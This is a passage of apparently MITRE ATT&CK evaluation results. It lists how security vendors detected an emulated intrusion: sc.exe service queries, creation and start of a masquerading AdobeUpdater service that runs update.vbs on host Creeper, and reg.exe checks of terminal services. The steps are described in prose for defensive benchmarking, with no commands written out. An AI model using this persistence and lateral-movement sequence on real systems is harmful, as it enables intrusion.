A Specific Behavior alert was generated for a script being modified/moved to a remote location. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed creation of update.vbs on 10.0.0.4 (Creeper). The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
Carbon Black
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to remotely query services on Creeper. Telemetry also showed module loads and a network connection to Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched the sc.exe execution with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query services on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because the user Bob was querying for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed sc.exe execution with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showed sc.exe execution to query services on Creeper. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed powershell.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing sc.exe to remotely query services on Creeper and enriched sc.exe with enriched with the condition SC Query Reconnaissance Command. The enrichment was tainted by the parent \"Powershell executed remote commands\" alert. The capability was modified after the start of the evaluation to allow the condition contributing to Enrichment to appear, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via sc.exe/net.exe tool. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe command remotely querying services on Creeper (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Tainted)
A General Behavior alert was generated for the sc utility be used to perform actions of remote services. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed execution of sc.exe to query services on 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query services on Creeper. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
Specific Behavior
A Specific Behavior alert was generated for sc.exe execution to create the AdobeUpdater service with the correct ATT&CK Technique (New Service). [1] [2]
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to create a new AdobeUpdater service containing a binPath pointed to cmd.exe with arguments to execute update.vbs. [1] [2]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating they observed a General Behavior because newly created file (AdobeUpdater service in registry) established persistence on the host. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description \"Synchronize with Adobe for security updates.\" The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3]
Cybereason
Telemetry
Telemetry showed sc.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for the unconventional creation of a new service with the correct ATT&CK Technique (New Service) and Tactic (Persistence, Privilege Escalation). The alert was tainted by a parent PowerShell alert. [1]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence). The enrichment was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Specific Behavior
A Specific Behavior alert was generated on the AdobeUpdater service named "Persistence-New Service". The alert was also tagged with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence). [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe execution to create the AdobeUpdater service and set the binPath to run cmd.exe with an argument to execute update.vbs. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence). [1] [2] [3]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command creating a new service called adobeupdater on Creeper from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3]
F-Secure
Specific Behavior
A Specific Behavior alert was generated for sc.exe used with parameters typical for lateral movement. [1] [2] [3]
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
Telemetry
Telemetry showed sc.exe execution with command-line arguments. [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe to create a new service named AdobeUpdater with binPath pointed to cmd.exe with arguments to run update.vbs and suspicious service description. The telemetry was tainted by the parent \"Powershell executed remote commands alert\". Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
Specific Behavior (Configuration Change)
An alert called "Windows Service Registry Key modified" and a Specific Behavior alert called "New Windows service created" were generated due to the AdobeUpdater service being created in the Registry. The capability may have been modified after the start of the evaluation to create these alerts, so the detection is identified as a configuration change. See Configuration page for details. [1] [2]
McAfee
Enrichment
The capability enriched sc.exe with a relevant ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via sc.exe/net.exe tool. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed that a new service was added. Telemetry also showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe execution to remotely create the AdobeUpdater service with a binPath set to run cmd.exe with an argument to execute update.vbs on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper shows the registry keys that were changed to add the new service [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for the suspicious service registration of AdobeUpdater. [1] [2] [3] [4]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a new service created via the command line. The alert was tainted by a parent alert on wscript.exe. [1] [2] [3] [4]
Enrichment
The capability enriched sc.exe executing with the correct ATT&CK Technique (New Service). [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed execution of sc.exe with command-line arguments to create a new AdobeUpdater service containing a binPath pointed to cmd.exe with arguments to execute update.vbs. Telemetry also showed the creation of Registry keys associated with this new service. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed execution of sc.exe to create a new service called AdobeUpdater with a binPath set to run cmd.exe and execute update.vbs. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to create the AdobeUpdater service on Creeper with a binPath pointing to cmd.exe to execute update.vbs. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry within the process trees showed execution of sc.exe with command-line arguments to create the AdobeUpdater service with binPath pointed to cmd.exe with arguments to execute update.vbs and a suspicious service description, which indicates masquerading. [1] [2] [3] [4] [5] [6]
CrowdStrike
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments for a new service called AdobeUpdater with binPath pointed to cmd.exe with arguments to execute update.vbs and service description \"Synchronize with Adobe for security updates.\". An analyst could use this information to determine it is not a legitimate service. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3]
Endgame
Telemetry (Tainted)
Telemetry showed sc.exe executions to create the AdobeUpdater service and set the binPath to run cmd.exe with an argument to execute update.vbs as well as set the description of the service. An analyst could use this information to determine masquerading occurred. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2] [3]
FireEye
Enrichment
The capability enriched the sc.exe command with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and the correct Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry within the process trees showed execution of sc.exe with command-line arguments to create the AdobeUpdater service with binPath pointed to cmd.exe with arguments to execute update.vbs and a suspicious service description, which could indicate masquerading. [1] [2] [3]
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe to create a new service named AdobeUpdater with binPath pointed to cmd.exe with arguments to run update.vbs and suspicious service description, which could assist an analyst in determining this was not a legitimate Adobe product. The telemetry was tainted by the parent \"Powershell executed remote commands alert\". Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe with command-line arguments, to create and configure the AdobeUpdater service, that an analyst could use to determine the service is masquerading. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe service creation command for the AdobeUpdater service with a binPath set to run update.vbs with cmd.exe on startup on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed the sc.exe command to set the service description, but a screenshot was not available. An analyst can use this information to determine AdobeUpdater is masquerading. [1] [2] [3] [4] [5] [6]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed execution of sc.exe with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed execution of sc.exe to create a new service called AdobeUpdater with a binPath set to run cmd.exe and execute update.vbs as well as set the service description. An analyst can use this information to determine the service is masquerading. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed executions of sc.exe to create the AdobeUpdater service on Creeper with a binPath pointing to cmd.exe to execute update.vbs as well as a setting the service description. An analyst can use this information to determine AdobeUpdater is masquerading. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched sc.exe execution with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to query the AdobeUpdater service on Creeper. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because the user Bob queried for a particular service on Creeper. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to query the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showed sc.exe execution to query the AdobeUpdater service on Creeper. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts.  Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts.   Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed sc.exe execution with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing sc.exe to query the AdobeUpdater service on Creeper and enriched sc.exe with the condition SC QC Reconnaissance Command. The enrichment was tainted by the parent \"Powershell executed remote commands alert\". The capability was modified after the start of the evaluation to allow the condition contributing to Enrichment to appear, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched sc.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that the configuration of a system service was queried. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed sc.exe remote service query on Creeper for the AdobeUpdater service (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment (Tainted)
The capability enriched powershell.exe executing sc.exe as enumeration of services via the command line. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed execution of sc.exe to query for the AdobeUpdater service on 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to query the AdobeUpdater service on Creeper. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
CrowdStrike
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
Cybereason
None
No detection capability demonstrated for this procedure. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
FireEye
None
No detection capability identified for this procedure. [1] [2] [3] [4]
F-Secure
Telemetry
Telemetry showed powershell.exe executing the type command with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
Microsoft
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a file read event for update.vbs. The telemetry was tainted by a parent alert on wscript.exe The process tree showing taintedness is visible within the same UI but did not fit within the current frame. [1] [2] [3] [4] [5] [6] [7] [8] [9]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry
Telemetry showed a remote access event on update.vbs. MITRE verified telemetry was generated for the remote update.vbs file access event, but no screenshot was available. [1] [2]
Carbon Black
Telemetry
Telemetry within the process tree showed execution of sc.exe with command-line arguments to start the AdobeUpdater service on Creeper. [1]
CrowdStrike
Specific Behavior (Delayed)
The OverWatch team sent an email indicating they observed a Specific Behavior because update.vbs executed following the start of the AdobeUpdater service. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe executing with command-line arguments to start the AdobeUpdater service on Creeper. The process tree view showed sc.exe as tainted by a previous powershell.exe detection. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing the update.vbs from the Adobe Flash Updater service. Telemetry also showed sc.exe executing the service. The telemetry was tainted by a parent PowerShell alert. [1] [2]
Endgame
Specific Behavior
A Specific Behavior alert was generated for the sc.exe command to start AdobeUpdater named "Service Command Lateral Movement". The alert was also tagged with the correct ATT&CK Technique (T1035 - Service Execution) and Tactic (Execution). [1] [2]
Enrichment (Delayed, Tainted)
The capability enriched sc.exe with the correct ATT&CK Technique (T1035 - Service Execution) and Tactic (Execution). The event was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts.   Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
Telemetry (Tainted)
Telemetry showed sc.exe execution to start the AdobeUpdater service on Creeper. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts.  Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2]
FireEye
Enrichment
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command starting the adobeupdater service on Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert. [1] [2]
F-Secure
Telemetry
Telemetry showed sc.exe execution with command-line arguments. [1] [2] [3]
Specific Behavior
A Specific Behavior alert was generated for sc.exe used with parameters typical for lateral movement. [1] [2] [3]
General Behavior
A General Behavior alert was generated showing that a spawned process (sc) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe to start the AdobeUpdater service on Creeper. The telemetry was tainted by the parent \"Powershell executed remote commands\" alert. Telemetry from Creeper also showed services.exe creating cmd.exe, which executed the update.vbs file (showing AdobeUpdater service starting). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2]
Enrichment
The capability enriched sc.exe with a relevant ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via sc.exe/net.exe tool. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry from CodeRed showed the sc.exe remote service start to execute the AdobeUpdater service on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper showed the execution sequence of Empire and command and control connections. [1] [2] [3] [4]
Specific Behavior
A Specific Behavior alert was generated for a successful AdobeUpdater remote service execution attempt on Creeper. [1] [2] [3] [4]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing sc with command-line arguments. As part of the service, telemetry also showed cmd.exe executing update.vbs on 10.0.0.4 (Creeper). The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3]
Enrichment
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (Service Execution). [1] [2] [3]
RSA
Telemetry
Telemetry showed execution of sc.exe to start the AdobeUpdater service on 10.0.0.4 (Creeper). Telemetry on Creeper showed the execution of cmd.exe to run update.vbs. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of sc.exe to start the AdobeUpdater service on Creeper. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2]
General Behavior
A General Behavior alert was generated for the lateral movement activity. A new story grouping was generated for the event on Creeper to associate subsequent activity. [1] [2]
Carbon Black
Telemetry
Telemetry within the process tree showed reg.exe executing with command-line arguments to check if terminal services were enabled. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services were enabled. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments indicating a check to see if terminal services was enabled. Telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The telemetry was tainted by the parent Reg Execution (Weak Signal) alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
Telemetry
Telemetry showed reg.exe with command-line arguments to check if terminal services were enabled. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments indicating a check to see if terminal services was enabled. The telemetry was tainted by the parent \"New Windows service created\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that Registry was queried for remote services RDP. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent cmd.exe alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched the powershell.exe that executed reg.exe with the ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that PowerShell queried terminal services Registry. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services was enabled (tainted by prior alert on suspicious PowerShell command-line). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services was enabled. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed reg.exe execution with command-line arguments indicating a check to see if terminal services was enabled. The activity seen during the lateral movement step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
Telemetry
Telemetry within the process tree showed reg.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry). [1] [2] [3] [4] [5] [6] [7] [8]
CrowdStrike
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The telemetry was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5]
Endgame
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments. The telemetry was tainted by parent PowerShell with Unusual Arguments and PowerShell Network alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Delayed, Tainted)
The capability enriched reg.exe with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
Enrichment
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Enrichment
The capability enriched reg.exe indicating that a sensitive registry key was accessed for potential reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated showing that a spawned process (reg) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed reg.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe with command-line arguments. The telemetry was tainted by the parent \"New Windows service created\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched reg.exe with the correct ATT&CK Tactic (Discovery) and Technique (Query Registry) and a suspicious indicator that the reg.exe utility queried the Registry. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed powershell.exe executing reg.exe. The telemetry was tainted by a trace detection on cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments (tainted by prior alert on suspicious PowerShell command line). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Enrichment
The capability enriched reg.exe executing with command-line arguments with a related ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
